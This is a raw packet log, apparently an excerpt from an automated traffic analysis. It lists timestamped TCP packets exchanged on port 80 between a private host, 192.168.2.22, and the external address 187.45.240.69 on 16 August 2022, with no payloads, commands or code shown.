                                        Aug 16, 2022 10:48:51.337047100 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.337119102 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.337127924 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.337882042 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.337980032 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.339267969 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.339310884 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.339365005 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.339376926 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.339404106 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.339410067 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.339437008 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.339473009 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.340106010 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.344827890 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.344872952 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.344911098 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.344918966 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.344940901 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.344948053 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.344981909 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.345015049 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354504108 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354559898 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354597092 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354598999 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354621887 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354645014 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354648113 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354687929 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354695082 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354727030 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354734898 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354768038 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354779959 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354809046 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.354814053 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.354856968 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491518021 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491571903 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491612911 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491651058 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491673946 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491689920 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491704941 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491710901 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491715908 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491730928 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491739988 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491770029 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491789103 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491810083 CEST8049198187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.491817951 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.491864920 CEST4919880192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.497452974 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.497572899 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.510687113 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553000927 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553041935 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553073883 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553097010 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553113937 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553178072 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553188086 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553195000 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553201914 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553215981 CEST8049196187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.553278923 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.553297043 CEST4919680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.573820114 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.574067116 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.590778112 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729243994 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729427099 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729470968 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729511976 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729549885 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729588985 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729629040 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729635954 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729666948 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729671001 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729676962 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729681969 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729686022 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729707003 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729747057 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729752064 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729762077 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729784012 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.729799986 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.729836941 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.732105017 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.821939945 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822079897 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822124004 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822186947 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822202921 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822228909 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822233915 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822240114 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822268009 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822289944 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822309017 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822326899 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822350979 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822362900 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822391033 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822402954 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822429895 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822444916 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822469950 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.822480917 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.822521925 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.825114965 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945316076 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945375919 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945435047 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945494890 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945523977 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945552111 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945557117 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945595980 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945625067 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945657015 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945709944 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945719957 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945748091 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945776939 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945780993 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945832014 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945838928 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945888042 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945892096 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945944071 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.945949078 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.945998907 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946007013 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946054935 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946058035 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946110964 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946116924 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946171045 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946182013 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946228027 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946238995 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946283102 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946290970 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946340084 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:51.946352959 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946403980 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:51.946861029 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.053936958 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.053971052 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.053994894 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054018974 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054043055 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054066896 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054097891 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054111004 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054114103 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054136038 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054150105 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054169893 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054197073 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054234028 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054275036 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054299116 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054322004 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054322958 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054343939 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054348946 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054366112 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054378986 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054380894 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054414988 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054457903 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054481983 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054497004 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054508924 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054528952 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054574013 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054585934 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054608107 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054641008 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054663897 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.054677010 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.054699898 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.055124044 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161186934 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161214113 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161235094 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161263943 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161288023 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161309004 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161330938 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161360025 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161370039 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161381960 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161390066 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161403894 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161427975 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161437988 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161454916 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161475897 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161479950 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161498070 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161510944 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161518097 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161520004 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161539078 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161549091 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161561966 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161581039 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161585093 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161612988 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161612988 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161633015 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.161645889 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161680937 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.161737919 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.163820982 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286056042 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286092997 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286114931 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286139965 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286164045 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286165953 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286185026 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286195993 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286207914 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286223888 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286259890 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286273003 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286273956 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286315918 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286345959 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286385059 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286387920 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286448002 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286452055 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286500931 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286520004 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286525011 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286566973 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286577940 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286623001 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286654949 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286673069 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286679983 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286731958 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286735058 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286756992 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286822081 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286832094 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286851883 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286875010 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286906958 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286933899 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.286983013 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.286994934 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287000895 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287055016 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287056923 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287106991 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287126064 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287151098 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287168026 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287205935 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287215948 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287251949 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287272930 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287293911 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287318945 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287353992 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287365913 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287429094 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287452936 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287477970 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287502050 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287504911 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287544966 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287549973 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287564039 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287585974 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287622929 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287647963 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287662983 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287686110 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287700891 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287719011 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287758112 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287760973 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287794113 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.287813902 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287858963 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.287950993 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.290482044 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.377753019 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.377791882 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.377815008 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.377854109 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.377880096 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.382654905 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.525928020 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.525994062 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526015997 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526037931 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526104927 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526146889 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526168108 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526210070 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526245117 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526285887 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526289940 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526319981 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526361942 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526420116 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.526428938 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.526457071 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.548129082 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601720095 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601773024 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601804018 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601810932 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601831913 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601843119 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601850033 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601861954 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601870060 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601886988 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.601908922 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.601938009 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.608490944 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.789908886 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.789925098 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.790002108 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.793291092 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.825865984 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825889111 CEST8049199187.45.240.69192.168.2.22
